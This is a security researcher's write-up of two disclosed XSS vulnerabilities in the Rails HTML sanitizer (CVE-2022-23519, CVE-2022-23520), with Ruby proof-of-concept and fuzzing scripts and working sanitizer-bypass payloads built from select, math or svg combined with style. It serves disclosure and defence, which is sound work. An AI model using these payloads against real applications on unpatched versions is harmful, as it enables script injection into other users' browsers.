A Tale of Two XSS in the Rails HTML Sanitizer

12 minute read Published: 20 Dec, 2022

Short write-up on CVE-2022-23519 and CVE-2022-23520, two XSS vulnerabilities in the Rails HTML sanitizer. It covers how the vulnerabilities work, the thought process behind finding them, and the code snippets used for fuzzing.

A while ago I was writing an application based on the Rails framework which returned sanitized user input. Its purpose was to build a PoC for an XSS vulnerability in the Rails HTML sanitizer (CVE-2022-32209, which appeared in June 2022). The following is a short write-up of that endeavour and how it turned into the discovery of two additional CVEs.

I start with a discussion of the original CVE-2022-32209, proceed with an investigation of the fix and how it turned out to be incomplete (CVE-2022-23520), explain how that motivated additional fuzzing which uncovered additional working attack payloads (CVE-2022-23519) and conclude with a brief outline of the fix (entirely designed and implemented by flavorjones).

CVE-2022-32209: XSS when select and style tags are allowed

The Rails HTML sanitizer gives Rails developers the ability to accept user input that contains HTML and return that HTML to (other) users, but without introducing XSS. It does that by allowing only selected sets of HTML tags and attributes and scrubbing the rest. As a developer, you can modify these allow lists. Of course, you should not do anything stupid like adding script to the allow list of HTML tags. Beyond that though, the job of the sanitizer is to work with any reasonable allow list developers come up with.

The starting point for CVE-2022-32209 is this HackerOne report. It describes how the Rails HTML sanitizer does not work properly when both the style and select tags are allowed.

Let’s write a small script to see what happens. I’ve stored it in a file sanitize-1-4-2.rb to emphasize that the version of the Rails sanitizer is pinned to 1.4.2. This is the code (heavily inspired by flavorjones, the author of the sanitizer, see here):

#! /usr/bin/env ruby

require "bundler/inline"
require 'bundler'

Bundler.configure_gem_home_and_path ".cache/bundler"
gemfile do
  source "https://rubygems.org"
  gem "rails-html-sanitizer", "=1.4.2"
end

require "rails-html-sanitizer"

if ARGV.length != 2
  puts "Pass 2 arguments:"
  puts " 1st the string to sanitize"
  puts " 2nd the tags you want to whitelist"
  exit
end

input = ARGV[0]
tags = ARGV[1].split(' ')

puts "Current Version  : " + Rails::Html::Sanitizer::VERSION
puts "Input string     : " + input
puts "Allowed tags     : " + tags.join(' ')

def sanitize(input, tags)
  Rails::Html::SafeListSanitizer.new.sanitize(input, tags: tags)
end

puts "Output           : " + sanitize(input, tags)

The script accepts two arguments: first a string to sanitize and second a list of allowed HTML tags. Then it will print the sanitized string to your console. Run it and you see that the sanitizer does a good job of sanitizing HTML:

user@notebook:~$ ./sanitize-1-4-2.rb '<div><script>alert()</script></div> <img src=x onerror=alert()>' 'div img'
Current Version  : 1.4.2
Input string     : <div><script>alert()</script></div> <img src=x onerror=alert()>
Allowed tags     : div img
Output           : <div>alert()</div> <img src="x">

We allowed both div and img as tags and the sanitizer removed all other dangerous tags and attributes from the HTML string. The script tag is gone and the onerror attribute of the img tag is removed too.

However, run it with the following input string while allowing tags select and style and surprisingly, the script tag in the input string remains exactly where it is:

user@notebook:~$ ./sanitize-1-4-2.rb '<select><style><script>alert()</script></style></select>' 'select style'
Current Version  : 1.4.2
Input string     : <select><style><script>alert()</script></style></select>
Allowed tags     : select style
Output           : <select><style><script>alert()</script></style></select>

The original HackerOne report used a slightly different, malformed string as input but it basically worked with the simple string above, as we’ve just seen. Version 1.4.3 rolled out a fix for the vulnerability, so everything should be fine when using that version.

CVE-2022-23520: Incomplete fix for CVE-2022-32209

Now one day I was building a small application in Rails and wanted to update my sanitizer to fix CVE-2022-32209. A small change in the Gemfile was all it took. Then I tested the payload shown above to make sure the Gem was actually updated. To my surprise though, the application was still vulnerable. First I convinced myself that the problem was not me being too stupid to update a Gem, then I went off investigating what was going on here.

Code for the sanitizer lives in its own repository at github.com/rails/rails-html-sanitizer. Looking at the recent commits, I found this one, which seemed to be the fix for CVE-2022-32209. Basically, all it does is define a new private method remove_safelist_tag_combinations on the sanitizer, which removes style from the list of allowed tags if select is in there too. This new method is used within another method allowed_tags, whose responsibility is to return the list of allowed tags and which is used within the sanitize method. See the relevant code below:

module Rails
  module Html
    class SafeListSanitizer < Sanitizer
    ...

      def sanitize(html, options = {})
        ...
        elsif allowed_tags(options) || allowed_attributes(options)
          @permit_scrubber.tags = allowed_tags(options)
        ...
      end
      ...

      private

      ...

      def remove_safelist_tag_combinations(tags)
        if !loofah_using_html5? && tags.include?("select") && tags.include?("style")
          warn("WARNING: #{self.class}: removing 'style' from safelist, should not be combined with 'select'")
          tags.delete("style")
        end
        tags
      end

      def allowed_tags(options)
        if options[:tags]
          remove_safelist_tag_combinations(options[:tags])
        else
          self.class.allowed_tags
        end
      end

      ...
    end
  end
end

You may have noticed that the method remove_safelist_tag_combinations is applied to the allowed tags only if they are passed within the options. If no tags are in the options, allowed_tags falls back to the class variable Rails::Html::SafeListSanitizer.allowed_tags, which contains a default value with a few harmless tags (source code). So far so good. All of this looks solid at first sight.

When building an application in Rails, you don’t use the Gem explicitly. Rather, it is part of the framework and “just there”. The documentation of Rails tells you how to use it here. In the docs you find different ways in which you can pass custom allowed tag lists. One is to use the Rails config/application.rb and set something like config.action_view.sanitized_allowed_tags = ["select", "style"]. The allow list will then be applied globally in your application. Another is to pass it explicitly as an option when calling the sanitizer, e.g., in your ERB templates. It could look like this: <p>Hello <%= sanitize @name, tags: ["select", "style"] %></p>. In this case, the allow list will be specific to this call.

When I updated my application and the fix did not work, I used the first of the ways shown above, i.e., setting an allow list in config/application.rb. It turned out that the way this setting works is that it overwrites the class variable Rails::Html::SafeListSanitizer.allowed_tags, which I think is exposed here in the ActionView helpers. As we saw above, the new method remove_safelist_tag_combinations does not apply to that list (since it was mistakenly assumed to be constant?). This means the fix does not work when setting allowed tags via config.
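The gap can be reproduced without the gem. The following is a minimal sketch that mirrors only the control flow of allowed_tags shown above. ToySanitizer, effective_tags and remove_unsafe_combinations are hypothetical names used for illustration, the default tag list is made up, and the HTML5 check is left out:

```ruby
# Toy model of the 1.4.3 logic (hypothetical class, not the gem's code).
class ToySanitizer
  class << self
    # Class-level allow list, writable from outside like the real one.
    attr_accessor :allowed_tags
  end
  self.allowed_tags = %w[b i p] # made-up default for this sketch

  # Returns the allow list that a sanitize call would end up using.
  def effective_tags(options = {})
    if options[:tags]
      # Only per-call lists go through the combination filter.
      remove_unsafe_combinations(options[:tags].dup)
    else
      # The class-level list is returned unfiltered.
      self.class.allowed_tags
    end
  end

  private

  def remove_unsafe_combinations(tags)
    tags.delete("style") if tags.include?("select") && tags.include?("style")
    tags
  end
end

per_call = ToySanitizer.new.effective_tags(tags: %w[select style])

ToySanitizer.allowed_tags = %w[select style]
global = ToySanitizer.new.effective_tags

puts per_call.inspect # ["select"]
puts global.inspect   # ["select", "style"]
```

In this model, the filter would have to run on the class-level list as well for the dangerous combination to be removed in both cases.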

You can convince yourself of the behaviour with this simple script which I’ve named sanitize-1-4-3.rb:

#! /usr/bin/env ruby

require "bundler/inline"
require 'bundler'

Bundler.configure_gem_home_and_path ".cache/bundler"

gemfile do
  source "https://rubygems.org"
  gem "rails-html-sanitizer", "=1.4.3"
end

require "rails-html-sanitizer"

if ARGV.length != 2
  puts "Pass 2 arguments:"
  puts " 1st the string to sanitize"
  puts " 2nd the tags you want to whitelist"
  exit
end

input = ARGV[0]
tags = ARGV[1].split(' ')

puts "Current Version         : " + Rails::Html::Sanitizer::VERSION
puts "Input string            : " + input
puts "Allowed tags            : " + tags.join(' ')

def sanitize_argument(input, tags)
  Rails::Html::SafeListSanitizer.new.sanitize(input, tags: tags)
end

# Overwrites the class-level allow list instead of passing the tags per call.
def sanitize_class_variable(input, tags)
  Rails::Html::SafeListSanitizer.allowed_tags = tags
  output = Rails::Html::SafeListSanitizer.new.sanitize(input)
  Rails::Html::SafeListSanitizer.allowed_tags = nil

  output
end

puts "Output (class variable) : " + sanitize_class_variable(input, tags)
puts "Output (argument)       : " + sanitize_argument(input, tags)

Run it and you get an output as shown below. As you can see, the string is properly sanitized when passing the allow list in the options but not sanitized when the class variable is overwritten:

user@notebook:~$ ./sanitize-1-4-3.rb '<select><style><script>alert()</script></style></select>' 'select style'
Current Version         : 1.4.3
Input string            : <select><style><script>alert()</script></style></select>
Allowed tags            : select style
Output (class variable) : <select><style><script>alert()</script></style></select>
WARNING: Rails::Html::SafeListSanitizer: removing 'style' from safelist, should not be combined with 'select'
Output (argument)       : <select>&lt;script&gt;alert()&lt;/script&gt;</select>

This was reported at HackerOne here and disclosed as CVE-2022-23520 and GHSA-rrfc-7g8p-99q8.

CVE-2022-23519: More XSS for math+style and svg+style

A reader with an eye for details may have noticed something strange about the fix. The method remove_safelist_tag_combinations removes style from the allow list only if three conditions are met:

style is in the list: makes perfect sense, remove style only if it is there
select is in the list: also makes sense, the combination was the problem
!loofah_using_html5?: this reads like “only if we are not using an HTML5 parser”

The third condition raises some suspicion. Could it be that the Rails sanitizer does not use an HTML5-compliant parser? If the parser of the sanitizer is different from the parser of your browser, then there could be a lot more problems than just the select and style tag combination.

To test, I wrote a small fuzzing script named fuzz-1-4-3.rb that would test a few hand-picked XSS payloads wrapped into all possible combinations of two HTML tags against the sanitizer. It looked like this:

#! /usr/bin/env ruby

require "bundler/inline"
require 'bundler'

Bundler.configure_gem_home_and_path ".cache/bundler"

gemfile do
  source "https://rubygems.org"
  gem "rails-html-sanitizer", "=1.4.3"
end

require "cgi" # provides CGI::escapeHTML, used in render below
require "rails-html-sanitizer"


puts "[+] Current Version : " + Rails::Html::Sanitizer::VERSION


def render(i, sanitized, wrapped_payload)
  html = <<-EOF
<html>
  <head>
    <script>
      function next() {
        window.location = "file:///tmp/www/file#{i+1}.html";
      }
    </script>
  </head>
  <body onload=next()>
    #{CGI::escapeHTML(wrapped_payload)}
    #{sanitized}
  </body>
</html>
  EOF

  File.write("/tmp/www/file#{i}.html", html)

  sanitized
end


def wrap(tag1, tag2, payload)
  "<#{tag1}><#{tag2}>#{payload}</#{tag1}></#{tag2}>"
end

def sanitize(tag1, tag2, s)
  Rails::Html::SafeListSanitizer.new.sanitize s, tags: [tag1, tag2]
end


html_tags = File.readlines("html-tags.txt", chomp: true)
payloads = {
  "<script>alert()</script>" => ["<script>"],
  "<img src=x onerror=alert()>" => ["onerror", "alert"],
}
i = 0


puts "[+] Generating test files..."
html_tags.each do |tag1|
  html_tags.each do |tag2|
    payloads.each do |payload, indicators|

      wrapped_payload = wrap(tag1, tag2, payload)
      sanitized = sanitize(tag1, tag2, wrapped_payload)
      if indicators.all? { |indicator| sanitized.include? indicator }
        render(i, sanitized, wrapped_payload)
        puts "- Rendered #{i} (allowed tags [#{tag1} #{tag2}]): #{sanitized}"
        i += 1
      end

    end
  end
end

A few explanations. The function render writes numbered HTML test files into /tmp/www/ (the numbering must be consecutive, starting at 0). You pass sanitized, the previously sanitized string, which is embedded in the HTML body as is. You also pass wrapped_payload, which is written to the HTML body in HTML-escaped form (just so you can later see what the payload was). The HTML head contains a script which changes the location to the next test file once the body has finished loading (e.g., it navigates to /tmp/www/file1.html if the current file is /tmp/www/file0.html). The idea is that the browser will later navigate from file to file, either until it reaches the end or until one of the sanitized XSS payloads calls alert(), which stops the process.

The next functions are wrap, which wraps a payload into the two tags tag1 and tag2, and sanitize, which sanitizes a string while allowing only tag1 and tag2.

The script also relies on a file html-tags.txt from which it reads the wordlist of HTML tags. Mine was compiled from various places and had 136 entries. Find it here.

I’ve also defined a Ruby hash called payloads with two simple XSS payloads, each accompanied by a list of strings I call indicators. The idea is to render a test file only when all of its indicator strings are still present in the sanitized output, which avoids rendering files that are unlikely to execute the payload.
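To make the indicator check concrete, here is a small sketch that applies it to two strings taken from this post. The helper name worth_rendering? is hypothetical; the check itself is the same all?/include? test the fuzzing script uses:

```ruby
# Same test as in the fuzzing script: every indicator must still be present.
def worth_rendering?(sanitized, indicators)
  indicators.all? { |indicator| sanitized.include?(indicator) }
end

indicators = ["onerror", "alert"]

# Output of the first example run: the onerror attribute was stripped.
scrubbed = '<div>alert()</div> <img src="x">'
# Payload that the sanitizer returns unchanged when math and style are allowed.
survived = "<math><style><img src=x onerror=alert()></math></style></math>"

puts worth_rendering?(scrubbed, indicators) # false
puts worth_rendering?(survived, indicators) # true
```

The check is only a cheap pre-filter. A string that passes it is not necessarily exploitable, which is why the browser run is still needed.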

Finally, at the bottom of the script, nested loops run through the list of tags and payloads, sanitize the wrapped payload and render the test file if all indicators are present. Note that I pass the allow list as an option to sanitize to avoid getting hits for the known combination of select and style.

Ensure html-tags.txt exists in the current directory and that /tmp/www/ exists and is empty, then run the script with ./fuzz-1-4-3.rb to generate 536 test files. Then open a browser. I’ve used chromium --disable-ipc-flooding-protection; without that flag, the browser may stop navigating to the next file after a while.
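The directory preparation can also be scripted. This is a minimal sketch, assuming the test files are named file<N>.html as in render above; prepare_output_dir is a hypothetical helper and not part of the original script:

```ruby
require "fileutils"

# Creates dir if needed and deletes leftover file<N>.html test files from
# earlier runs. Returns the number of files that were removed.
def prepare_output_dir(dir)
  FileUtils.mkdir_p(dir)
  stale = Dir.glob(File.join(dir, "file*.html"))
  FileUtils.rm_f(stale)
  stale.size
end

# Example: call prepare_output_dir("/tmp/www") before generating the test files.
```

Clearing old files matters because each page navigates to the next number. If a later run generates fewer files, leftovers with higher numbers from an earlier run would silently extend the chain.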

In the browser, navigate to file:///tmp/www/file0.html, then watch. After a short while, you should see an alert for “file163.html”, which contains the wrapped payload <math><style><img src=x onerror=alert()></math></style></math>:

**XSS payload in file163.html executed**

Keep going and you will get two more hits for “file498.html” and “file499.html”. In the end, all of them are due to the following two combinations of tags, which allow for XSS just like the combination select and style did:

math and style: works for a payload like <math><style><img src=x onerror=alert()></math></style></math>, which the sanitizer will not change
svg and style: works for both payloads <svg><style><script>alert()</script></svg></style></svg> and <svg><style><img src=x onerror=alert()></svg></style></svg>

This was reported at HackerOne here and disclosed as CVE-2022-23519 and GHSA-9h9g-93gc-623h.

The underlying problem and its current fix

If you really want to know what is going on under the hood then stop reading this and go to these decision notes instead. You will find a very extensive and detailed analysis of these and other related CVEs there (note that the repository is github.com/flavorjones/loofah, which is the actual implementation of the Rails HTML sanitizer).

The short summary of this analysis: the problem is indeed the use of an HTML4 parser. An HTML4 DOM seems to treat the contents of the style tags as CDATA which needs no escaping or sanitization. In an HTML5 DOM however everything inside math and svg tags is “foreign content” and special parsing rules apply. For example, for the case of <math><style><img src=x onerror=alert()></math></style></math>, an HTML5 parser seems to treat the img tag within math and style as an error and repairs the DOM for you by moving it out (as described here).

The fix this time appears to be this commit, which is an implementation of solution two presented in the decision notes. Effectively it now escapes everything the HTML4 parser parses as CDATA.

You can convince yourself by building a test script like those shown above, but for version 1.4.4 of the Gem. Run it and you see that the characters <, > and & are escaped now:

user@notebook:~$ ./sanitize-1-4-4.rb '<math><style><img src=x onerror=alert()></math></style></math>' 'math style'
Current Version  : 1.4.4
Input string     : <math><style><img src=x onerror=alert()></math></style></math>
Allowed tags     : math style
Output           : <math><style>&lt;img src=x onerror=alert()&gt;&lt;/math&gt;</style></math>
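The escaping visible in this output can be imitated in a few lines. This is a sketch of the escaping step only, not the gem's implementation; escape_cdata and ESCAPES are hypothetical names:

```ruby
# Replacement table for the three characters mentioned above.
ESCAPES = { "&" => "&amp;", "<" => "&lt;", ">" => "&gt;" }.freeze

# Escapes text so that a browser renders it as text instead of markup.
def escape_cdata(text)
  text.gsub(/[&<>]/, ESCAPES)
end

# Everything between <style> and </style> in the input string above.
inner = "<img src=x onerror=alert()></math>"

puts "<math><style>#{escape_cdata(inner)}</style></math>"
# prints <math><style>&lt;img src=x onerror=alert()&gt;&lt;/math&gt;</style></math>
```

Once the angle brackets are escaped, the img tag no longer exists as markup, so it makes no difference where an HTML5 parser would have moved it.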

Moreover, if you re-run the fuzzing script with the Gem version bumped to 1.4.4, you still get 269 test files, but none of them triggers an alert anymore. Thus, it looks to me as if this particular issue is finally gone.